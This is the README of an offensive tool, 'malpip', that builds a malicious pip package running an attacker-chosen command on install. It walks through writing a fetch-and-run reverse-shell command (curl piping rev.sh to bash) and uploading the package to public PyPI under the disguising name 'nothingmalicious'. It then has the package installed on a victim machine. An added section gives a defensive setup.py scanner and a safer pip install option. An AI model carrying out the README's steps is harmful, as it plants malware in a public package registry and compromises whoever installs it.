malpip
Tool that creates a malicious pip package that runs your command during installation.
Prerequisite
Create an account on https://pypi.org
Installation
- Clone repository and set permissions.
git clone https://github.com/thegoodhackertv/malpip.git
cd malpip
sudo chmod +x malpip.sh
- Install dependencies.
sudo ./malpip install
- Set the command to be executed.
echo "curl -s http://localhost/rev.sh | bash" > command.txt
- Create the malicious project. You will be asked for your PyPI credentials to upload the project.
./malpip create nothingmalicious command.txt
- Install the package on the victim machine and your command will be executed.
pip install nothingmalicious
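From the defending side, a package like this can be flagged before `pip install` by inspecting the `setup.py` in its source distribution. The scanner below is an added example, not part of malpip; it assumes the command is triggered from the package's `setup.py` (the README does not say how), and the watch list and sample `setup.py` are constructed for illustration.

```python
import ast

# Assumed watch list of calls that spawn a process or evaluate code; extend as needed.
EXEC_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.call", "subprocess.Popen",
              "subprocess.check_call", "subprocess.check_output", "exec", "eval"}

# Constructed sample input: a setup.py that hooks the install step (benign echo).
SAMPLE = '''\
from setuptools import setup
from setuptools.command.install import install
import os as _o

class PostInstall(install):
    def run(self):
        _o.system("echo constructed-sample")
        install.run(self)

setup(name="example-pkg", version="0.0.1",
      cmdclass={"install": PostInstall})
'''

def dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    return ".".join([node.id] + parts[::-1]) if isinstance(node, ast.Name) else None

def scan_setup_py(source):
    """Return sorted (line, message) findings for install-time execution indicators."""
    tree, aliases, findings = ast.parse(source), {}, []
    for node in ast.walk(tree):  # pass 1: map local names to their imported origin
        if isinstance(node, ast.Import):
            aliases.update({a.asname or a.name: a.name for a in node.names})
        elif isinstance(node, ast.ImportFrom) and node.module:
            aliases.update({a.asname or a.name: f"{node.module}.{a.name}" for a in node.names})
    for node in (n for n in ast.walk(tree) if isinstance(n, ast.Call)):  # pass 2: flag calls
        name = dotted(node.func)
        if name:
            head, dot, rest = name.partition(".")
            full = aliases.get(head, head) + dot + rest  # undo "import x as y" renames
            if full in EXEC_CALLS:
                findings.append((node.lineno, f"calls {full}"))
        findings += [(kw.value.lineno, "cmdclass override") for kw in node.keywords if kw.arg == "cmdclass"]
    return sorted(findings)

if __name__ == "__main__":
    print(scan_setup_py(SAMPLE))
```

Installing with `pip install --only-binary :all:` makes pip refuse source distributions, so no `setup.py` is run on the installing machine.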
Useful Resources
- YouTube video (Spanish)
- Website post (Spanish)
Disclaimer
Usage of these scripts for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.